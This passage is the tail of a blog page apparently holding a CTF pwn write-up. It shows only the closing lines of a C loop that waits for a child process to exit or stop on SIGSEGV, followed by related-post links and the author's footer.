    <span class="p">}</span> <span class="k">while</span> <span class="p">(</span><span class="o">!</span><span class="n">WIFEXITED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="o">!</span><span class="n">WIFSTOPPED</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">||</span> <span class="n">WSTOPSIG</span><span class="p">(</span><span class="n">stat_loc</span><span class="p">)</span> <span class="o">!=</span> <span class="n">SIGSEGV</span><span class="p">));</span>
  <span class="p">}</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

</code></pre></div></div>


          </div>
        </div>

        




  

  
    <section class="related-posts">
      <h3 class="related-posts-title">RELATED POSTS</h3>
      <div class="related-posts-list">
        
    
      
        
        
        

        
      
    
      
        
        
        

        
          <div class="related-post-item">
            <span class="related-post-date">[ 2026-05-26 ]</span>
            <a href="/2026/05/26/CTF-Dot.html" class="related-post-link">CTF 的句点</a>
            <span class="common-tags"> #pwn</span>
          </div>
          
          
        
      
    
      
        
        
        

        
      
    
      
        
        
        

        
          <div class="related-post-item">
            <span class="related-post-date">[ 2025-11-11 ]</span>
            <a href="/2025/11/11/QWB-Qual-2025-babybus.html" class="related-post-link">强网杯线上赛 2025 babybus</a>
            <span class="common-tags"> #pwn</span>
          </div>
          
          
        
      
    
      
        
        
        

        
          <div class="related-post-item">
            <span class="related-post-date">[ 2025-10-11 ]</span>
            <a href="/2025/10/11/MidnightSunFinal-2025-Flop.html" class="related-post-link">Midnight Sun CTF 2025 Final - flop</a>
            <span class="common-tags"> #pwn</span>
          </div>
          
          
            
  
      </div>
    </section>
  



        <div id="comments" class="post-comments"
  data-valine-url="https://unpkg.com/valine@1.5.3/dist/Valine.min.js"
  data-app-id="Ji5y9HTOlb2QGDO0XFlWXNRy-gzGzoHsz"
  data-app-key="6VqGye1352LX381YQDTOaiXs"
  data-placeholder="El Psy Congroo">
  <button class="comments-load" type="button">LOAD_COMMENTS</button>
</div>
<script src="/assets/js/comments.js" defer></script>


        <a class="u-url" href="/2025/01/20/XHLJ-2025.html" hidden></a>
</article>

<script src="/assets/js/post.js?v=20260716-source-link-spacing"
        data-external-icon-manifest="/assets/external-link-icons/manifest.json"
        defer></script>



    </div>
  </main><footer class="site-footer h-card">
  <data class="u-url" href="/%20/"></data>
  <div class="wrapper">
    <div class="footer-header">
      <h2 class="footer-heading">[ Y²的博客 ]</h2>
      <p class="footer-status">STATUS: ONLINE / UPTIME: <span id="site-uptime">∞</span></p>
    </div>

    <div class="footer-layout">
      <!-- Col 1: Contact -->
      <div class="footer-col">
        <div class="footer-title">CONTACT_INFO</div>
        <div class="footer-content">
          <p class="p-name">Y² (aka.cameudis)</p><a class="u-email" href="mailto:cameudis@gmail.com">cameudis@gmail.com</a></div>
      </div>

      <!-- Col 2: Social Links -->
      <div class="footer-col">
        <div class="footer-title">SOCIAL_NETWORKS</div>
        <div class="footer-content"><ul class="social-media-list"><li><a href="https://github.com/cameudis"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">cameudis</span></a></li><li><a href="https://twitter.com/cameudis"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">cameudis</span></a></li></ul></div>
      </div>

      <!-- Col 3: Visitor Map -->
      <div class="footer-col">
        <div class="footer-title">VISITOR_MAP</div>
        <div class="footer-map-mini"
          data-map-src="https://mapmyvisitors.com/map.js?d=VEk4VYKnI9sCCEXCgdKor_rhcYKrCEm6C9mIRceo1og&amp;cl=ffffff&amp;w=a"></div>
      </div>
    </div>

    <div class="footer-bottom">
      <p class="quiet-humor">/* Free and useless. */</p>
      <div style="margin-bottom: 20px;">
        <img src="https://blog-1308958542.cos.ap-shanghai.myqcloud.com/20251230224502598.gif" alt="badge" width="88"
          height="31" loading="lazy" decoding="async">
      </div>
      <p>&copy; 2026 Y² (aka.cameudis)</p>
    </div>
  </div>
</footer>
<script src="/assets/js/footer.js?v=20260715-3" defer></script>
</body>

</html>
